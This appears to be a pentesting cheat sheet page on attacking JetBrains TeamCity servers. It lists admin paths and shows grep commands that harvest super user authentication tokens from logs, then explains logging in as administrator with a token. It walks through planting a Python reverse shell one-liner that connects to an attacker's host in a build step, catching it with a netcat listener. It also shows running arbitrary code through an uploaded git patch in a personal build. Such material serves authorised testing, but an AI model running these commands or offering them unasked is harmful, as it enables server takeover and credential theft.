# TeamCity Pentesting

TeamCity is a build management and continuous integration server from JetBrains.

### Common Directories <a href="#common-directories" id="common-directories"></a>

```
/admin
/admin/admin.html
```

### Interesting Files in Systems <a href="#interesting-files-in-systems" id="interesting-files-in-systems"></a>

```
TeamCity/conf/teamcity-startup.propertie
.BuildServer/system
```

### Find Super User Authentication Tokens <a href="#find-super-user-authentication-tokens" id="find-super-user-authentication-tokens"></a>

If we find a super user authentication token, we can login as super user using the token.

```
grep -rni 'authentication token' TeamCity/logs
grep -rni 'Super user authentication token' TeamCity/logs
grep -rni 'token' TeamCity/logs
```

After retrieving, we can login as **administrator** by **entering the token in the password field and empty the username**.

### Arbitrary Command Execution by Custom Script <a href="#arbitrary-command-execution-by-custom-script" id="arbitrary-command-execution-by-custom-script"></a>

1. Login as **admin user**.
2. Create a new project in admin dashboard.
3. Click **"Manual"** tab and fill required fields.
4. A new project is created.
5. In the project home, create a **Build Configurations**.
6. In the build configuration page, click **"Build Steps"** on the left menus.
7. Add build step.
8. Select **"Command Line"** in **Runner type**.
9. Put a Python reverse shell script in the **"Custom script"**.

   ```
   export RHOST="<local-ip>";export RPORT=<local-port>;python3 -c 'import socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("bash")'
   ```
10. Start listener in local machine.

    ```
    nc -lvnp 4444
    ```
11. Click **"Run"** button in the build page.
12. We should get a shell in terminal.

### Arbitrary Command Execution by Diff Build <a href="#arbitrary-command-execution-by-diff-build" id="arbitrary-command-execution-by-diff-build"></a>

If we can modify a building script, we can execute arbitrary script by uploading a git patch file.\
First, modify the script to our desired code.

```
cd /path/to/repository
vim example.ps
git diff > patch
```

Then go to the build configuration page, and open the **"Run Custom Build"** at the right of the Run button.\
In General section, check **"run as personal build"** and upload the patch file which was generated above.\
Now click **"Run Build"**. Our arbitrary code will be executed when building.

### References <a href="#references" id="references"></a>

* [JetBrains](https://www.jetbrains.com/help/teamcity/teamcity-data-directory.html)